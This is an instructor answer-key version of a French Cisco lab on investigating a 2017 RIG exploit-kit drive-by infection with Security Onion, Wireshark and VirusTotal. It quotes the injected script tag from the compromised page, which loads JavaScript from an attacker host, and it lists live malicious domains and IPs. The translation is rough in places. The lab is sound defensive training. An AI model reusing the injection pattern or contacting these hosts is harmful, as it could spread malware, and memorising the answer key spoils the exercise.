27.2.15 Lab - Investigating A Malware Exploit - ILM
27.2.15 Lab - Investigating A Malware Exploit - ILM
27.2.15 Lab - Investigating A Malware Exploit - ILM
(Version de l'instructeur)
Remarque à l'intention de l'instructeur : le texte en rouge ou surligné en gris apparaît uniquement dans la
version de l'instructeur.
Objectifs
Au cours de ces travaux pratiques, vous allez:
Partie 1: Utiliser Kibana pour en savoir plus sur une exploitation malveillante
Ces travaux pratiques sont basés sur un exercice du site web malware-traffic-analysis.net qui est une
excellente ressource pour apprendre à analyser les attaques de réseaux et d'hôtes. Merci à brad@malware-
traffic-analysis.net pour l'autorisation d'utiliser le matériel de son site.
Remarque: Ces travaux pratiques nécessitent un ordinateur hôte qui peut accéder à l'internet.
Contexte/scénario
Vous avez décidé d'interviewer pour un emploi dans une entreprise de taille moyenne en tant qu'analyste de
la cybersécurité de niveau 1. Il vous a été demandé de démontrer votre capacité à identifier les détails d'une
attaque au cours de laquelle un ordinateur a été compromis. Votre objectif est de répondre à une série de
questions en utilisant Sguil, Kibana et Wireshark dans Security Onion.
Ressources requises
Accès Internet
2020 - 日曜日 Cisco et/ou ses filiales. Tous droits réservés. Document public de Cisco Page 1 sur 23 www.netacad.com
Travaux pratiques - Enquêter sur une exploitation d'un logiciel malveillant
Instructions
Partie 1 : Utiliser Kibana pour en savoir plus sur une exploitation malveillante
Dans la partie 1, utilisez Kibana pour répondre aux questions suivantes. Pour vous aider à démarrer, vous
êtes informé que l'attaque a eu lieu à un moment donné au cours du mois de janvier 2017. Vous devrez
identifier l'heure exacte.
a. Ouvrez une session sur la machine virtuelle Security Onion avec le nom d'utilisateur analyst et le mot de
passe cyberops .
b. Ouvrez Kibana ( analyste comme nom d'utilisateur et cyberopscomme mot de passe) et définissez une
plage de temps absolue pour restreindre le focus afin de consigner les données à partir de janvier 2017.
c. Vous verrez apparaître un graphique avec une seule entrée s'affichant. Pour afficher plus de détails, vous
devez réduire la durée affichée. Affinez la plage de temps dans la visualisation Nombre total de journaux
au fil du temps en cliquant et en faisant glisser la souris pour sélectionner une zone autour du point de
données du graphique. Vous devrez peut-être répéter ce processus jusqu'à ce que vous voyez des
détails dans le graphique.
Remarque: Utilisez la touche <Esc> pour fermer toutes les boîtes de dialogue susceptibles d'interférer
avec votre travail.
2020 - 日曜日 Cisco et/ou ses filiales. Tous droits réservés. Document public de Cisco Page 2 sur 23 www.netacad.com
Travaux pratiques - Enquêter sur une exploitation d'un logiciel malveillant
a. Après avoir réduit la plage de temps dans le tableau de bord Kibana principal, accédez au tableau de
bord NIDS Alert Data en cliquant sur NIDS.
b. Effectuez un zoom avant sur l'événement en cliquant et en faisant glisser la visualisation NIDS -Alertes
au fil du temps. Étant donné que l'événement s'est produit sur une très courte période de temps,
sélectionnez uniquement la ligne de tracé du graphique. Effectuez un zoom avant jusqu'à ce que votre
écran ressemble à celui ci-dessous.
2020 - 日曜日 Cisco et/ou ses filiales. Tous droits réservés. Document public de Cisco Page 3 sur 23 www.netacad.com
Travaux pratiques - Enquêter sur une exploitation d'un logiciel malveillant
c. Cliquez sur le premier point de la chronologie pour filtrer uniquement le premier événement.
d. Maintenant, affichez les détails des événements qui se sont produits à ce moment-là. Faites défiler
jusqu'au bas du tableau de bord jusqu'à ce que vous voyez la section Alertes NIDS de la page. Les
alertes sont organisées selon le temps. Développez le premier événement de la liste en cliquant sur la
flèche du pointeur située à gauche de l'horodatage.
172.16.4.193
2020 - 日曜日 Cisco et/ou ses filiales. Tous droits réservés. Document public de Cisco Page 4 sur 23 www.netacad.com
Travaux pratiques - Enquêter sur une exploitation d'un logiciel malveillant
194.87.234.129
80, HTTP
Russie
f. Dans un navigateur Web sur un ordinateur qui peut se connecter à Internet, accédez au lien fourni dans
le champ signature_info de l'alerte. Cela vous amène à la règle d'alerte Snort des menaces émergentes
pour l'exploit. Il y a une série de règles affichées. Cela s'explique par le fait que les signatures peuvent
changer au fil du temps ou que de nouvelles règles plus précises sont élaborées. La règle la plus récente
se trouve en haut de la page. Examinez les détails du règles.
Questions :
Exploit_KIT_RIG
Qu'est-ce qu'un kit d'exploit? (EK) Recherche sur Internet pour répondre à cette question.
Un kit d'exploits est un exploit qui utilise plusieurs sites Web et redirections pour infecter un
ordinateur avec des logiciels malveillants.
Les kits d'exploitation utilisent fréquemment ce qu'on appelle une attaque de conduite pour lancer la
campagne d'attaque. Dans une attaque en voiture, un utilisateur visitera un site Web qui devrait être
considéré comme sûr. Cependant, les acteurs de la menace trouvent des moyens de compromettre les
sites Web légitimes en trouvant des vulnérabilités sur les serveurs Web qui les hébergent. Ces
vulnérabilités permettent aux acteurs de menaces d'insérer leur propre code malveillant dans le code
2020 - 日曜日 Cisco et/ou ses filiales. Tous droits réservés. Document public de Cisco Page 5 sur 23 www.netacad.com
Travaux pratiques - Enquêter sur une exploitation d'un logiciel malveillant
HTML d'une page Web. Le code est fréquemment inséré dans un iFrame. iFrames permettent d'afficher
le contenu de différents sites Web dans la même page Web. Les acteurs de menaces créent
fréquemment un iFrame invisible qui connecte le navigateur à un site Web malveillant. Le code HTML du
site Web qui est chargé dans le navigateur contient souvent un JavaScript qui envoie le navigateur vers
un autre site Web malveillant ou télécharge des logiciels malveillants jusqu'à ce que l'ordinateur.
a. Cliquez sur la valeur alert_id, vous pouvez faire pivoter vers CAPMe pour inspecter la transcription de
l'événement.
2020 - 日曜日 Cisco et/ou ses filiales. Tous droits réservés. Document public de Cisco Page 6 sur 23 www.netacad.com
Travaux pratiques - Enquêter sur une exploitation d'un logiciel malveillant
Dans la fenêtre de CapMe! , vous pouvez voir la transcription de la session. Il affiche les transactions
entre l'ordinateur source, en bleu, et les destinations auxquelles la source accède. Beaucoup
d'informations précieuses, y compris un lien vers le fichier pcap lié à cette alerte, sont disponibles dans la
transcription.
Examinez le premier bloc de texte bleu. Il s'agit de la requête de la source vers le serveur web de
destination. Notez que deux URL sont répertoriées dans ce bloc. Le premier est étiqueté comme SRC:
REFERER. Il s'agit du site Web auquel l'ordinateur source a accédé pour la première fois. Cependant, le
serveur a référé le navigateur à la requête HTTP GET vers le serveur SRC:HOST. Quelque chose dans
le HTML a envoyé la source à ce site. On dirait que ça pourrait être une attaque en voiture!
Questions :
www.homeimprovement.com
ty.benme.com
Quel type de contenu est demandé par l'hôte source à partir de tybenme.com? Pourquoi cela pourrait-il
être un problème? Regardez aussi dans le bloc serveur DST de la transcription.
2020 - 日曜日 Cisco et/ou ses filiales. Tous droits réservés. Document public de Cisco Page 7 sur 23 www.netacad.com
Travaux pratiques - Enquêter sur une exploitation d'un logiciel malveillant
Le contenu est affiché sous la forme gzip. Il peut s'agir d'un fichier malveillant qui a été demandé
au téléchargement. Il s'agit probablement d'un fichier malveillant. Comme il est compressé, le
contenu du fichier est obscurci. Il n'est pas facile de voir ce qu'il y a dans le fichier.
c. En haut du tableau de bord d'alerte NIDS, cliquez sur l'entrée HTTP située sous l'en-tête Zeek Hunting .
d. Dans le tableau de bord HTTP, vérifiez que votre plage de temps absolue inclut 2017-01-27
22:54:30 .000 à 2017-01-27 22:56:00 .000.
www.bing.com
p27dokhpz2n7nvgr.1jw2lx.top
homeimprovement.com
tyu.benme.com
www.google-analytics.com
api.blockcipher.com
spotsbill.com
fpdownload2.macromedia.com
retrotip.visionurbana.com.ve
Nous devrions connaître certains de ces sites Web à partir de la transcription que nous avons lu plus tôt.
Tous les sites affichés ne font pas partie de la campagne d'exploitation. Recherchez les URL en les
recherchant sur Internet. Ne vous connectez pas à eux. Placez les URL entre guillemets lorsque vous
effectuez vos recherches.
Questions :
p27dokhpz2n7nvgr.1jw2lx.top
homeimprovement.com
2020 - 日曜日 Cisco et/ou ses filiales. Tous droits réservés. Document public de Cisco Page 8 sur 23 www.netacad.com
Travaux pratiques - Enquêter sur une exploitation d'un logiciel malveillant
tyu.benme.com
spotsbill.com
retrotip.visionurbana.com.ve
Quels sont les types HTTP - MIME répertoriés dans le Tag Cloud?
Remarque: Les ID d'alerte utilisés dans ce laboratoire sont par exemple uniquement. Les ID d'alerte sur votre
machine virtuelle peuvent être différents.
a. Lancez Sguil depuis le bureau. Connectez-vous avec le nom d'utilisateur analyst et le mot de passe
cyberops. Activez tous les capteurs et cliquez sur Démarrer.
Selon Sguil, quels sont les horodatages pour la première et la dernière des alertes qui se sont produites
dans environ une seconde de l'autre?
a. Cochez les cases Afficher les données du paquet et Afficher la règle pour afficher les informations du
champ d'en-tête du paquet et la règle de signature IDS associée à l'alerte.
b. Sélectionnez l'ID d'alerte 5.2 (Message d'événement ET CURRENT Evil Redirector Leading to EK 12
juil. 2016).
Question :
Selon la règle de signature IDS, quelle famille de logiciels malveillants a déclenché cette alerte? Vous
devrez peut-être faire défiler la signature d'alerte pour trouver cette entrée.
2020 - 日曜日 Cisco et/ou ses filiales. Tous droits réservés. Document public de Cisco Page 9 sur 23 www.netacad.com
Travaux pratiques - Enquêter sur une exploitation d'un logiciel malveillant
Malware_famille PseudoDarkLeech
c. Agrandir la fenêtre Sguil et dimensionner la colonne Message d'événement afin que vous puissiez voir le
texte de l'intégralité du message. Consultez les Messages d'événement pour chacun des ID d'alerte liés à
cette attaque.
Questions :
Selon les Messages d'événements de Sguil, quel kit d'exploit (EK) est impliqué dans cette attaque?
RIG EK Exploit
Au-delà de l'étiquetage de l'attaque comme une activité de cheval de Troie, quelles autres informations
sont fournies concernant le type et le nom du logiciel malveillant concerné?
ransomware, Cerber
Selon votre meilleure estimation en regardant les alertes jusqu'à présent, quel est le vecteur de base de
cette attaque? Comment s'est déroulée l'attaque?
a. Cliquez avec le bouton droit de la souris sur l'ID d'alerte associé 5.2 (Message d'événement ET
CURRENT_EVENTS Evil Redirecteur menant à EK le 12 juil. Sélectionnez Transcription dans le
menu comme indiqué sur la figure.
Question :
Quels sont les sites Web référents et hôtes impliqués dans le premier événement SRC? Que pensez-
vous que l'utilisateur a fait pour générer cette alerte?
2020 - 日曜日 Cisco et/ou ses filiales. Tous droits réservés. Document public de Cisco Page 10 sur 23 www.netacad.com
Travaux pratiques - Enquêter sur une exploitation d'un logiciel malveillant
L'utilisateur a publié une recherche sur Bing avec les termes de recherche «amélioration de la
maison remodelage de votre cuisine». L'utilisateur a cliqué sur le lien
www.homeimprovement.com et a visité ce site.
b. Cliquez avec le bouton droit de la souris sur l'ID d'alerte 5.24 (adresse IP source 139.59.160.143 et
message d'événement ET CURRENT_EVENTS Evil redirecteur menant à EK le 15 mars 2017) et
choisissez Transcription pour ouvrir une transcription de la conversation.
dle_js.js
gzip
d. Fermez la fenêtre de transcription actuelle. Dans la fenêtre Sguil, cliquez avec le bouton droit sur l'ID
d'alerte 5.25 (Message d'événement ET CURRENT_EVENTS Rig EK URI Struct Mar 13 2017 M2) et
2020 - 日曜日 Cisco et/ou ses filiales. Tous droits réservés. Document public de Cisco Page 11 sur 23 www.netacad.com
Travaux pratiques - Enquêter sur une exploitation d'un logiciel malveillant
ouvrez la transcription. Selon les informations contenues dans la transcription répondre aux questions
suivantes:
Questions :
3 requêtes et 3 réponses
OBTENIR/ ?ct=vivaldi&biw=vivaldi.95ec
www.homeimprovement.com/remodeling-your-kitchen-cabinets.html
tyu.benme.com
Oui, gzip
tyu.benme.com
Yes, gzip
2020 - 日曜日 Cisco et/ou ses filiales. Tous droits réservés. Document public de Cisco Page 12 sur 23 www.netacad.com
Travaux pratiques - Enquêter sur une exploitation d'un logiciel malveillant
OBTENIR/ ?BIW=SeaMonkey.105...
http://tyu.benme.com/?biw...
application/x-shockwave-flash
Quels étaient les 3 premiers caractères des données de la réponse? Les données démarrent après la
dernière entrée de DST:
CWS
CWS est une signature de fichier. Les signatures de fichier aident à identifier le type de fichier qui est
représenté différents types de données. Accédez au site Web suivant
https://en.wikipedia.org/wiki/List_of_file_signatures. Utilisez Ctrl-F pour ouvrir une zone de recherche.
Recherchez cette signature de fichier pour savoir quel type de fichier a été téléchargé dans les données.
Question :
Quel type de fichier a été téléchargé ? Quelle application utilise ce type de fichier?
f. Cliquez à nouveau avec le bouton droit sur le même ID et choisissez Network Miner. Cliquez sur l'onglet
Files.
Question :
Il y a trois dossiers. Deux sont des fichiers .html et un autre est le fichier .swf.
2020 - 日曜日 Cisco et/ou ses filiales. Tous droits réservés. Document public de Cisco Page 13 sur 23 www.netacad.com
Travaux pratiques - Enquêter sur une exploitation d'un logiciel malveillant
a. Dans Sguil, cliquez avec le bouton droit de la souris sur l'ID d'alerte 5.2 (Message d'événement ET
CURRENT_EVENTS Evil Redirector Leading to EK Jul 12 2016) et faites pivoter pour sélectionner
Wireshark dans le menu. Le pcap associé à cette alerte s'ouvrira dans Wireshark.
b. Le paramètre Wireshark par défaut utilise un temps relatif par paquet qui n'est pas très utile pour isoler
l'heure exacte d'un événement. Pour résoudre ce problème, sélectionnez Affichage > Format
d'affichage de l'heure > Date et heure du jour , puis répétez une seconde fois Affichage > Format
d'affichage de l'heure > Secondes. Maintenant, votre colonne Wireshark Time a la date et l'horodatage.
Redimensionnez les colonnes pour rendre l'affichage plus clair si nécessaire.
a. Dans Wireshark, utilisez le filtre d'affichage http.request pour filtrer uniquement les demandes Web.
b. Sélectionnez le premier paquet. Dans la zone de détails des paquets, développez les données de couche
d'application Hypertext Transfer Protocol.
Question :
Bing
a. Dans Wireshark, choisissez Fichier > Exporter des objets > HTTP.
2020 - 日曜日 Cisco et/ou ses filiales. Tous droits réservés. Document public de Cisco Page 14 sur 23 www.netacad.com
Travaux pratiques - Enquêter sur une exploitation d'un logiciel malveillant
b. Dans la fenêtre de liste Exporter des objets HTTP, sélectionnez le paquet remodeling-your-kitchen-
cabinets.html et enregistrez-le dans votre dossier personnel.
c. Fermez Wireshark. Dans Sguil, cliquez avec le bouton droit sur l'ID d'alerte 5.24 (adresse IP source
139.59.160.143 et message d'événement ET CURRENT_EVENTS Evil redirecteur menant à EK le 15
mars 2017) et choisissez Wireshark pour faire pivoter vers Wireshark. Appliquez un filtre d'affichage
http.request et répondez aux questions suivantes:
Questions :
retrotip.visionurbana.com.ve
d. Dans Wireshark, accédez à Fichier > Exporter des objets > HTTP et enregistrez le fichier JavaScript
dans votre dossier personnel.
e. Fermez Wireshark. Dans Sguil, cliquez avec le bouton droit de la souris sur l'ID d'alerte 5.25 (Message
d'événement ET CURRENT_EVENTS RIG EK URI Struct Mar 13 2017 M2) et choisissez Wireshark
pour faire pivoter vers Wireshark. Appliquez un filtre d'affichage http.request. Notez que cette alerte
correspond aux trois requêtes GET, POST et GET que nous avons examinées plus tôt.
2020 - 日曜日 Cisco et/ou ses filiales. Tous droits réservés. Document public de Cisco Page 15 sur 23 www.netacad.com
Travaux pratiques - Enquêter sur une exploitation d'un logiciel malveillant
f. Lorsque le premier paquet est sélectionné, dans la zone de détails des paquets, développez les données
de couche d'application Hypertext Transfer Protocol. Cliquez avec le bouton droit sur les informations
de l'hôte et choisissez Appliquer en tant que colonne pour ajouter les informations de l'hôte aux
colonnes de la liste de paquets, comme illustré dans la figure.
g. Pour faire de la place pour la colonne Hôte, cliquez avec le bouton droit sur l'en-tête de colonne Longueur
et décochez la case. Cela supprimera la colonne Longueur de l'affichage.
h. Les noms des serveurs sont désormais clairement visibles dans la colonne Hôte de la liste des paquets.
Nous savons que l'utilisateur avait l'intention d'accéder à www.homeimprovement.com, mais le site a renvoyé
l'utilisateur à d'autres sites. Finalement, des fichiers ont été téléchargés sur l'hôte à partir d'un site malveillant.
Dans cette partie du laboratoire, nous allons accéder aux fichiers qui ont été téléchargés et soumettre un
hachage de fichier à VirusToTAL pour vérifier qu'un fichier malveillant a été téléchargé.
a. Dans Wireshark, allez dans Fichier > Exporter des objets > HTTP et enregistrez les deux fichiers
text/html et le fichier application/x-shockwave-flash dans votre répertoire personnel.
2020 - 日曜日 Cisco et/ou ses filiales. Tous droits réservés. Document public de Cisco Page 16 sur 23 www.netacad.com
Travaux pratiques - Enquêter sur une exploitation d'un logiciel malveillant
b. Maintenant que vous avez enregistré les trois fichiers dans votre dossier personnel, testez si l'un des
fichiers correspond à une valeur de hachage connue pour les logiciels malveillants sur virustotal.com.
Éxecutez une commande ls -l pour regarder les fichiers enregistrés dans votre répertoire personnel. Le
fichier flash porte le mot SeaMonkey près du début du nom de fichier long. Le nom de fichier commence
par%3FBIW=SeaMonkey . Utilisez la commande ls -l avec grep pour filtrer le nom du fichier avec le
pattern seamonkey. L'option -i ignore la distinction de casse.
c. Générez un hachage SHA-1 pour le fichier flash SeaMonkey avec la commande sha1sum suivie du nom
de fichier. Tapez les 4 premières lettres%3fb du nom de fichier, puis appuyez sur la touche de tabulation
pour remplir automatiquement le reste du nom de fichier. Appuyez sur Entrée et sha1sum calculera une
valeur de hachage de longueur fixe de 40 chiffres.
Mettez en surbrillance la valeur de hachage, cliquez avec le bouton droit et copiez-la Le sha1sum est mis
en surbrillance dans l'exemple ci-dessous. Remarque: N'oubliez pas d'utiliser la complétion d'onglet.
d. Vous pouvez également générer une valeur de hachage à l'aide de NetworkMiner. Accédez à Sguil et
cliquez avec le bouton droit de la souris sur l'ID d'alerte 5.25 (Message d'événement ET
CURRENT_EVENTS RIG EK Struct Mar 13 2017 M2) et sélectionnez Réseau Minor pour faire pivoter
vers Réseau Minor. Sélectionner l'onglet Files . Dans cet exemple, cliquez avec le bouton droit de la
souris sur le fichier avec l'extension swf et sélectionnez Calculate MD5/SHA1/SHA256 hash. Comparez
la valeur de hachage SHA1 avec celle de l'étape précédente. Les valeurs de hachage SHA1 doivent être
les mêmes.
2020 - 日曜日 Cisco et/ou ses filiales. Tous droits réservés. Document public de Cisco Page 17 sur 23 www.netacad.com
Travaux pratiques - Enquêter sur une exploitation d'un logiciel malveillant
e. Ouvrez un navigateur Web et allez sur virustotal.com. Cliquez sur l'onglet Rechercher et entrez la
valeur de hachage pour rechercher une correspondance dans la base de données des hachages de
malwares connus. VirusToTAL renvoie une liste des moteurs de détection de virus qui ont une règle qui
correspond à ce hachage.
f. Examinez les onglets Détection et Détails. Passez en revue les informations fournies sur cette valeur de
hachage.
Question :
Les réponses varient, mais à partir de la réponse, vous pouvez vérifier que le SWF fait partie du
kit d'exploitation Rigek. 32 des 55 programmes antivirus ont des règles qui identifient ce hachage
comme provenant d'un fichier malveillant.
g. Fermez le navigateur et Wireshark. Dans Sguil, utilisez l'ID d'alerte 5.37 (Message d'événement ET
CURRENT_EVENTS RIG EK Landing 12 sept. 2016 T2) pour pivoter vers Wireshark et examiner les
requêtes HTTP.
Questions :
Oui, les alertes montrent les requêtes GET, POST et GET à tyu.benme, com
2020 - 日曜日 Cisco et/ou ses filiales. Tous droits réservés. Document public de Cisco Page 18 sur 23 www.netacad.com
Travaux pratiques - Enquêter sur une exploitation d'un logiciel malveillant
Oui, deux fichiers texte/html et un fichier flash. Les noms des fichiers sont différents.
h. Créez un hachage SHA-1 du fichier SWF comme vous l'avez fait précédemment.
Question :
Est-ce le même logiciel malveillant qui a été téléchargé lors de la session HTTP précédente ?
Oui Les deux hachages correspondent même si les noms de fichiers sont différents.
i. À Sguil, les 4 dernières alertes de cette série sont liées, et elles semblent également être post-infection.
Questions :
Qu'est-ce qui est intéressant à propos de la première alerte dans les 4 dernières alertes de la série ?
Quel type de communication a lieu dans les deuxième et troisième alertes de la série et qu'est-ce qui la
rend suspecte ?
Il s'agit de demandes DNS qui sont lancées à partir de l'hôte local ; cependant, il est peu probable
qu'elles soient le résultat d'une activité normale de l'utilisateur. Ils doivent être envoyés par le
fichier malveillant. Le domaine .top ne ressemble pas à un nom de domaine valide.
j. Allez sur virustotal.com et effectuez une recherche d'URL pour le domaine .top utilisé dans l'attaque.
Question :
k. Examinez la dernière alerte de la série dans Wireshark. S'il a des objets qui valent la peine d'être
sauvegardés, exportez-les et enregistrez-les dans votre dossier personnel.
Question :
Oui EE7EA-D39….
2020 - 日曜日 Cisco et/ou ses filiales. Tous droits réservés. Document public de Cisco Page 19 sur 23 www.netacad.com
Travaux pratiques - Enquêter sur une exploitation d'un logiciel malveillant
Pouvez-vous trouver les deux endroits de la page Web qui font partie de l'attaque de drive-by qui a
déclenché l'exploit? Conseil: le premier se trouve dans le <head> et le second se trouve dans la zone
<body> de la page.
<head profile="http://gmpg.org/xfn/11">
<script type="text/javascript"
src="//retrotip.visionurbana.com.ve/engine/classes/js/dle_js.js"></script>
<!-- Tout en un SEO Pack 2.3.2.3 par Michael Torbert de Semper Fi Web Design [291,330]
—>
2020 - 日曜日 Cisco et/ou ses filiales. Tous droits réservés. Document public de Cisco Page 20 sur 23 www.netacad.com
Travaux pratiques - Enquêter sur une exploitation d'un logiciel malveillant
Javascript document.write () va écrire du contenu sur la page Web, en créant un iframe, qui
emmène l'utilisateur vers un URI à tyu.benme.com
c. Dans un éditeur de texte, ouvrez le fichier texte/html qui a été enregistré dans votre dossier personnel
avec Vivaldi dans le nom de fichier.
Quelles sont les choses intéressantes à propos de l'iframe ? Est-ce que ça appelle quelque chose ?
2020 - 日曜日 Cisco et/ou ses filiales. Tous droits réservés. Document public de Cisco Page 21 sur 23 www.netacad.com
Travaux pratiques - Enquêter sur une exploitation d'un logiciel malveillant
Il écrit dans la fenêtre du navigateur. Il crée un formulaire HTML et soumet la variable NormalURL
via POST. La variable normalUrl est égale à un URI sur tyu.benme.com.
La fonction getBrowser () détermine le type de navigateur dans lequel la page Web est affichée.
Remarques générales
Les kits d'exploits sont des exploits assez complexes qui utilisent une variété de méthodes et de ressources
pour mener une attaque. Il est intéressant de noter que les EK peuvent être utilisés pour fournir diverses
charges utiles de logiciels malveillants. En effet, le développeur EK peut offrir le kit d'exploitation en tant que
service à d'autres acteurs de menace. Par conséquent, RIG EK a été associé à un certain nombre de
charges utiles différentes de logiciels malveillants. Les questions suivantes peuvent vous obliger à
approfondir les données à l'aide des outils qui ont été introduits dans ce laboratoire.
2. Il est utile de « raconter l'histoire » d'un exploit pour comprendre ce qui s'est passé et comment il fonctionne.
Commencez par l'utilisateur qui recherche sur Internet avec Bing. Cherchez sur le Web pour plus
d'informations sur le RIG EK pour vous aider.
2020 - 日曜日 Cisco et/ou ses filiales. Tous droits réservés. Document public de Cisco Page 22 sur 23 www.netacad.com
Travaux pratiques - Enquêter sur une exploitation d'un logiciel malveillant
Plusieurs réponses sont possibles. Le but de cette question est d'initier les élèves à réfléchir à la
nature à étapes multiples des EK et à la complexité des cyberattaques en général.
L'utilisateur recherche avec Bing des informations sur les améliorations domiciliales. L'utilisateur
clique sur un lien vers www.homeimprovments.com. Ce site a été compromis par un acteur de menace.
Un javascript s'exécute et télécharge éventuellement un fichier Adobe Flash malveillant. Le fichier
Flash exécute et télécharge les logiciels malveillants. Une fois le logiciel malveillant installé, il vérifie
avec un serveur CNC.
Fin du document
2020 - 日曜日 Cisco et/ou ses filiales. Tous droits réservés. Document public de Cisco Page 23 sur 23 www.netacad.com